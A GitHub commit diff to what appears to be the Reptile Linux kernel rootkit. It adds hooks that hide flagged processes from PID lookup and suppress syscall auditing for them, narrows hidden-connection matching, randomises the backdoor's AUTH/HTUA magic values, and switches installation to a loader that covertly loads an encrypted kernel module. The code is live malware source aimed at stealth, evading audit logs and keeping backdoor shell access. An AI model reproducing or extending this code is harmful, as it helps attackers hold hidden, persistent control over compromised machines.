update

attackgithub · Dec 7, 2018 · eaa4345 · eaa4345
1 parent f790b05
commit eaa4345
Show file tree

Hide file tree

Showing 5 changed files with 54 additions and 13 deletions.
diff --git a/parasite_loader/kmatryoshka.c b/parasite_loader/kmatryoshka.c
@@ -55,6 +55,7 @@ static inline unsigned long ksym_lookup_name(const char *name)
 
 int init_module(void)
 {
+	int ret = -EINVAL;
 	asmlinkage long (*sys_init_module)(const void *, unsigned long, const char *) = NULL;
 
 	do_decrypt(parasite_blob, sizeof(parasite_blob), DECRYPT_KEY);
@@ -72,11 +73,11 @@ int init_module(void)
 			nullarg++;
 
 		user_addr_max() = roundup((unsigned long)parasite_blob + sizeof(parasite_blob), PAGE_SIZE);
-		sys_init_module(parasite_blob, sizeof(parasite_blob), nullarg);
+		if(sys_init_module(parasite_blob, sizeof(parasite_blob), nullarg) == 0) ret = -37; // would be 1337, but is too obvious. hahaha
 		user_addr_max() = seg;
 	}
 
-	return -EINVAL;
+	return ret;
 }
 
 MODULE_LICENSE("GPL");

diff --git a/rep_mod.c b/rep_mod.c
@@ -5,6 +5,7 @@
  *
  */
 
+#include <linux/audit.h>
 #include <linux/binfmts.h>
 #include <linux/cred.h>
 #include <linux/dirent.h>
@@ -31,9 +32,9 @@
 #include <linux/workqueue.h>
 #include <net/inet_sock.h>
 
+#include "config.h"
 #include "engine/engine.c"
 #include "engine/engine.h"
-#include "config.h"
 
 #if LINUX_VERSION_CODE < KERNEL_VERSION(2, 6, 20)
 #define REPTILE_INIT_WORK(_t, _f) INIT_WORK((_t), (void (*)(void *))(_f), (_t))
@@ -43,8 +44,7 @@
 
 #define bzero(b, len) (memset((b), '\0', (len)), (void)0)
 #define SSIZE_MAX 32767
-#define AUTH 0xdeadbeef
-#define HTUA 0xc0debabe
+#define FLAG 0x80000000
 #define RL_BUFSIZE 2048
 #define TOK_BUFSIZE 64
 #define TOK_DELIM                                      \
@@ -53,11 +53,14 @@
 		p[0] = 0x00000020;                     \
 		(char *)p;                             \
 	})
+
+/*  
+ *  All these definitions below is random and can be changed if you want
+ *  But make sure you will change that in sbin/util.h
+ */
 #define ID 12345
 #define SEQ 28782
 #define WIN 8192
-#define TMPSZ 150
-#define FLAG 0x80000000
 
 int hidden = 1, hide_module = 0, file_tampering = 0, control_flag = 0;
 struct workqueue_struct *work_queue;
@@ -887,7 +890,7 @@ static int khook_tcp4_seq_show(struct seq_file *seq, void *v)
 
 	list_for_each_entry(hc, &hidden_tcp_conn, list)
 	{
-		if (hc->addr.sin_port == dport &&
+		if ( //hc->addr.sin_port == dport &&
 		    hc->addr.sin_addr.s_addr == daddr) {
 			ret = 0;
 			goto out;
@@ -941,6 +944,35 @@ static void khook_exit_creds(struct task_struct *p)
 	KHOOK_PUT(exit_creds);
 }
 
+KHOOK(audit_alloc);
+static int khook_audit_alloc(struct task_struct *t)
+{
+	int err = 0;
+
+	KHOOK_GET(audit_alloc);
+	if (t->flags & FLAG) {
+		clear_tsk_thread_flag(t, TIF_SYSCALL_AUDIT);
+	} else {
+		err = KHOOK_ORIGIN(audit_alloc, t);
+	}
+	KHOOK_PUT(audit_alloc);
+	return err;
+}
+
+KHOOK(find_task_by_vpid);
+struct task_struct *khook_find_task_by_vpid(pid_t vnr)
+{
+	struct task_struct *tsk = NULL;
+
+	KHOOK_GET(find_task_by_vpid);
+	tsk = KHOOK_ORIGIN(find_task_by_vpid, vnr);
+	if (tsk && (tsk->flags & FLAG) && !(current->flags & FLAG))
+		tsk = NULL;
+
+	KHOOK_PUT(find_task_by_vpid);
+	return tsk;
+}
+
 static int __init reptile_init(void)
 {
 	int ret;

diff --git a/sbin/cmd.c b/sbin/cmd.c
@@ -10,8 +10,8 @@
 #include <sys/types.h>
 #include <unistd.h>
 
-#define AUTH 0xdeadbeef
-#define HTUA 0xc0debabe
+#include "config.h"
+
 #define SHELL "/bin/bash"
 
 struct control {

diff --git a/sbin/reverse.c b/sbin/reverse.c
@@ -243,8 +243,6 @@ int runshell(int client)
 
 #ifdef _REPTILE_
 
-#define AUTH 0xdeadbeef
-#define HTUA 0xc0debabe
 #define HIDE 1
 #define UNHIDE 0
 

diff --git a/setup.sh b/setup.sh
@@ -179,6 +179,8 @@ EOF
 	START="/"$MODULE"/"$MODULE"_start"
 	TAGIN="#<$TAG>"
 	TAGOUT="#</$TAG>"
+	AUTH=0x$(openssl rand -hex 4)
+	HTUA=0x$(openssl rand -hex 4)
 
 	cat > config.script <<EOF
 #ifndef _CONFIG_H
@@ -194,6 +196,8 @@ EOF
 #define PATH        "PATH=/sbin:/bin:/usr/sbin:/usr/bin"
 #define WORKQUEUE	"ata/0"
 #define SRCPORT 	$SRCPORT
+#define AUTH		$AUTH
+#define HTUA		$HTUA
 
 #endif
 EOF
@@ -218,6 +222,8 @@ EOF
 #define OUT 		5
 #define EXIT_LEN 	16
 #define EXIT 		";7(Zu9YTsA7qQ#vw"
+#define AUTH		$AUTH
+#define HTUA		$HTUA
 
 #endif
 EOF
@@ -264,8 +270,12 @@ function reptile_install {
     #	echo -ne "#<$TAG>\n$MODULE\n#</$TAG>" >> /etc/modules || { echo -e "\e[01;31mERROR!\e[00m\n"; exit; }
     fi
 
-	depmod && insmod /$MODULE/$MODULE.ko > /dev/null 2>&1
+	gcc loader.c -o loader
+	depmod && \
+	#insmod /$MODULE/$MODULE.ko > /dev/null 2>&1 
+	./loader /$MODULE/$MODULE.ko && \
 	echo -e "\e[01;36mDONE!\e[00m\n" || { echo -e "\e[01;31mERROR!\e[00m\n"; exit; }
+	rm -f loader
 
 	directory_remove
 	echo -e "\nInstalation has finished!\n"